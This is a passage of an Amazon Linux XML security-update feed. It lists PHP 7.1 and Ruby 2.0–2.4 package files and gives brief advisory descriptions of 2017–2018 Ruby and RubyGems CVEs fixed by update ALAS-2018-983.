version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.15" release="1.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-ldap-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" 
version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.15" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.15" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-snmp-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.15" release="1.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-devel-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.15-1.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-983</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-983: medium priority package update for ruby20 ruby22 ruby23 ruby24</title><issued date="2018-04-04 23:18:00" /><updated date="2018-05-10 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8780:
It was found that the methods from the Dir class did not properly handle strings containing the NULL byte. An attacker, able to inject NULL bytes in a path, could possibly trigger an unspecified behavior of the ruby script.
1561949:
CVE-2018-8780 ruby: Unintentional directory traversal by poisoned NULL byte in Dir
CVE-2018-8779:
It was found that the UNIXSocket::open and UNIXServer::open ruby methods did not handle the NULL byte properly. An attacker, able to inject NULL bytes in the socket path, could possibly trigger an unspecified behavior of the ruby script.
1561948:
CVE-2018-8779 ruby: Unintentional socket creation by poisoned NULL byte in UNIXServer and UNIXSocket
CVE-2018-8778:
An integer underflow was found in the way String#unpack decodes the unpacking format. An attacker, able to control the unpack format, could use this flaw to disclose arbitrary parts of the application&#039;s memory.
1561953:
CVE-2018-8778 ruby: Buffer under-read in String#unpack
CVE-2018-8777:
It was found that WEBrick could be forced to use an excessive amount of memory during the processing of HTTP requests, leading to a Denial of Service. An attacker could use this flaw to send huge requests to a WEBrick application, resulting in the server running out of memory.
1561950:
CVE-2018-8777 ruby: DoS by large request in WEBrick
CVE-2018-6914:
It was found that the tmpdir and tempfile modules did not sanitize their file name argument. An attacker with control over the name could create temporary files and directories outside of the dedicated directory.
1561947:
CVE-2018-6914 ruby: Unintentional file and directory creation with directory traversal in tempfile and tmpdir
CVE-2018-1000079:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability in gem installation that can result in the gem writing to arbitrary filesystem locations during installation. This attack appears to be exploitable when the victim installs a malicious gem. This vulnerability appears to have been fixed in 2.7.6.
1547426:
CVE-2018-1000079 rubygems: Path traversal issue during gem installation allows to write to arbitrary filesystem locations
CVE-2018-1000078:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Cross Site Scripting (XSS) vulnerability in the gem server display of the homepage attribute that can result in XSS. This attack appears to be exploitable when the victim browses to a malicious gem on a vulnerable gem server. This vulnerability appears to have been fixed in 2.7.6.
1547425:
CVE-2018-1000078 rubygems: XSS vulnerability in homepage attribute when displayed via gem server
CVE-2018-1000077:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains an Improper Input Validation vulnerability in the ruby gems specification homepage attribute that can result in a malicious gem setting an invalid homepage URL. This vulnerability appears to have been fixed in 2.7.6.
1547422:
CVE-2018-1000077 rubygems: Missing URL validation on spec home attribute allows malicious gem to set an invalid homepage URL
CVE-2018-1000076:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains an Improper Verification of Cryptographic Signature vulnerability in package.rb that can result in a mis-signed gem being installed, as the tarball would contain multiple gem signatures. This vulnerability appears to have been fixed in 2.7.6.
1547421:
CVE-2018-1000076 rubygems: Improper verification of signatures in tarball allows to install mis-signed gem
CVE-2018-1000075:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains an infinite loop vulnerability in the ruby gem package tar header, where a negative size could cause an infinite loop. This vulnerability appears to have been fixed in 2.7.6.
1547420:
CVE-2018-1000075 rubygems: Infinite loop vulnerability due to negative size in tar header causes Denial of Service
CVE-2018-1000074:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Deserialization of Untrusted Data vulnerability in the owner command that can result in code execution. This attack appears to be exploitable when the victim runs the `gem owner` command on a gem with a specially crafted YAML file. This vulnerability appears to have been fixed in 2.7.6.
1547419:
CVE-2018-1000074 rubygems: Unsafe Object Deserialization Vulnerability in gem owner allowing arbitrary code execution on specially crafted YAML
CVE-2018-1000073:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability in the install_location function of package.rb that can result in path traversal when writing to a symlinked basedir outside of the root. This vulnerability appears to have been fixed in 2.7.6.
1547418:
CVE-2018-1000073 rubygems: Path traversal when writing to a symlinked basedir outside of the root
CVE-2017-17790:
The &quot;lazy_initialize&quot; function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands.
1528218:
CVE-2017-17790 ruby: Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code execution
CVE-2017-17742:
It was found that WEBrick did not sanitize headers sent back to clients, resulting in a response-splitting vulnerability. An attacker, able to control the server&#039;s headers, could force WEBrick into injecting additional headers to a client.
1561952:
CVE-2017-17742 ruby: HTTP response splitting in WEBrick
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17742" title="" id="CVE-2017-17742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17790" title="" id="CVE-2017-17790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000073" title="" id="CVE-2018-1000073" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000074" title="" id="CVE-2018-1000074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000075" title="" id="CVE-2018-1000075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000076" title="" id="CVE-2018-1000076" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000077" title="" id="CVE-2018-1000077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000078" title="" id="CVE-2018-1000078" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000079" title="" id="CVE-2018-1000079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6914" title="" id="CVE-2018-6914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8777" title="" id="CVE-2018-8777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8778" title="" id="CVE-2018-8778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8779" title="" id="CVE-2018-8779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8780" title="" id="CVE-2018-8780" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby23-libs" version="2.3.7" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby23-libs-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.3" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.3-1.19.amzn1.noarch.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.7" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23-doc" version="2.3.7" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.7-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23" version="2.3.7" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby23-irb" version="2.3.7" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.7-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23-devel" version="2.3.7" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby23-devel-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems23" version="2.5.2.3" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.3-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.19.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.19.amzn1.i686.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.19.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.7" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.7-1.19.amzn1.i686.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.1" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.1-1.30.6.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" version="2.4.4" release="1.30.6.amzn1" epoch="0" 
arch="noarch"><filename>Packages/ruby24-irb-2.4.4-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.4-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.1" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.1-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-devel" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-libs" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.4" release="1.30.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.4-1.30.6.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="1.30.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-1.30.6.amzn1.noarch.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-1.30.6.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.4" release="1.30.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.4-1.30.6.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.10" release="1.11.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygems22" version="2.4.5.2" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5.2-1.11.amzn1.noarch.rpm</filename></package><package name="ruby22-irb" version="2.2.10" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.10-1.11.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8.1-1.11.amzn1.x86_64.rpm</filename></package><package name="ruby22-devel" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="ruby22-libs" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.11.amzn1.x86_64.rpm</filename></package><package name="rubygems22-devel" version="2.4.5.2" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5.2-1.11.amzn1.noarch.rpm</filename></package><package name="ruby22" version="2.2.10" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.10-1.11.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.10" release="1.11.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.10-1.11.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.11.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.11.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.10" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.10-1.11.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8.1-1.11.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.31.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-1.31.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-1.31.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="1.31.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-1.31.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="1.31.amzn1" epoch="0" 
